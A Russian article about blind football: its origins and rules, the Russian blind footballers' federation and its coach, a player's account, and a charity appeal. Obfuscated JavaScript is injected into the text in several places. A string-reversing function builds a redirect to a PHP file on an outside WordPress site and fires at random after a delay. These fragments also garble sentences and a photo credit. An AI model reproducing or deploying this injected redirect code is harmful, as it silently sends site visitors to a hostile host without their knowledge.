Незрячие футболисты — пример силы духа, выходящей за рамки привычного. fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru рассказывает, как ограниченные возможности превращаются в безграничные и как футбол становится делом жизни для слабовидящих и незрячих атлетов.
Могут ли слепые играть в футбол
Это первый вопрос, который возникает у всех, кто впервые слышит о футболе для незрячих. Такой вид спорта действительно существует. Он возник в 1986 году в Испании. Там прошли первые национальные соревнования по футболу для слепых, а спустя 12 лет — чемпионат мира. Футбол для незрячих можно считать продолжением голбола — командной игры, созданной для реабилитации ветеранов Второй мировой войны в 1946 году. В 2004-м футбол незрячих был включён в программу Паралимпийских игр в Афинах, а с 2006 года был признан IBSA (Международной федерацией спорта слепых. — Прим. ред.) и UEFA (Союзом европейских футбольных ассоциаций. — Прим. ред.).
Правила в футболе для незрячих такие же, как в мини-футболе: поле 40 х 20 метров, два тайма по 25 минут, 5 игроков в команде. Ключевое отличие — специальный звуковой мяч с трещоткой, он меньше и тяжелее обычного. Так как степень поражения органов зрения у спортсменов разная — от частичной до полной, все играют в светонепроницаемых очках, благодаря этому футболисты оказываются в равных условиях. Звук мяча и голосовые сигналы (при атаке кричат «бой!», чтобы избежать столкновений) позволяют футболистам ориентироваться в ситуации на поле, поэтому зрители должны соблюдать полную тишину.
Как развивается футбол для незрячих
Фото: «Федерация слепых футболистов»
Сегодня профессиональные клубы слепых футболистов есть по всему миру. У каждого их них есть фирменная экипировка, свои болельщики, у многих — финансированием на государственном уровне. В Бразилии существует более сорока футбольных команд слепых, в Великобритании футболистов профессионально готовят в Королевской национальной академии для слепых в Херефорде, которую спонсируют правительство и Британская футбольная ассоциация. Это даёт слепым футболистам шанс на успешную карьеру и высокую зарплату.
Как обстоят дела в России
В нашей стране о футболе для незрячих по-прежнему известно немногим. На протяжении 15 лет развитием этого вида спорта занимается Федерация слепых футболистов, которая существует при поддержке его главного тренера и президента Николая Берегового. В футбол для незрячих Николая привела личная история: во время службы его армейский товарищ получил серьёзное ранение и лишился зрения. У Берегового появилась идея помогать незрячим и через спорт менять их жизнь к лучшему.
Подопечные Николая Берегового стали 12-кратными чемпионами России, 28-кратными победителями Международных турниров, чемпионами Европы 2017 и 2018 годов, заняли 4 место на чемпионате мира 2018 года. Для многих спортсменов футбол стал главным делом в жизни. Многие благодаря спорту начали путешествовать — сборная побывала в Италии, Англии, Франции, Канаде, США.
Фото: «Федерация слепых футболистов»
Фото: «Федерация слепых футболистов»
Алексей Локтионов
40 лет, занимается в Федерации слепых футболистов с 2005 года, с рождения был слабовидящим, сейчас полностью слепой
— Я в спорте благодаря отцу: он показал мне футбол. Ещё с раннего детства меня увлекла эта игра. Сначала это было просто хобби, я занимался футболом для людей с ослабленным зрением. А в 2005-м Николай Береговой пригласил меня в Федерацию слепых футболистов. Теперь футбол — моя работа и важная часть моей жизни. Футбол развивает уверенность в себе. Когда ты на поле, ты точно чувствуешь других игроков, угадываешь, как их обойти, как избежать столкновения. Когда я только начал тренироваться, у меня была мечта попасть на чемпионат Европы. Она сбылась. Появилась новое желание, которое раньше казалось недостижимым: попасть на чемпионат мира и Олимпиаду.
Трудности, с которыми сталкиваются незрячие футболисты
В 2020 году даже в столице нет ни одной обустроенной площадки для тренировки незрячих. Ещё одна проблема — нехватка тренерского состава и отсутствие школы футбола для слепых. Особенно сложно спортсменам бывает на соревнованиях, когда команду из 13-14 человек сопровождают всего двое или трое зрячих. В большинстве европейских команд — минимум 5-6 тренеров, а вся система построена таким образом, чтобы слепые спортсмены могли получить высокооплачиваемую работу, самореализоваться и построить успешную карьеру.
Сложности, с которыми ежедневно сталкиваются российские тренеры и слепые футболисты, их не останавливают. Собственным примером эти люди доказывают, что стоит отбросить ограничивающие установки — и перед вами откроются безграничные возможности.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com, на фото — девушки из команды по голболу, Испания
Благотворительная платформа Meet for Charity запустила проект Sport for Charity для помощи слепым футболистам. На $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to/aHR0cHM6Ly93d3cuc3BvcnRmb3JjaGFyaXR5LnRvZGF5Lw==»>сайте каждый желающий может пожертвовать любую сумму в поддержку Федерации слепых футболистов.
Статьи по теме
Футболистка и тренер Елена Терехова: «Когда выходишь на поле, отключаешься от посторонних мыслей и полностью отдаёшься игре»
Елена Федосеева: «Зрение считают залогом счастья. Раз слепой, то несчастен. Но это не так»
«Спектакли ломают шаблоны»: Маргарита Ребецкая — об особом театре в России
Он стал легендой Паралимпиады без побед: история Ибрагима Хамато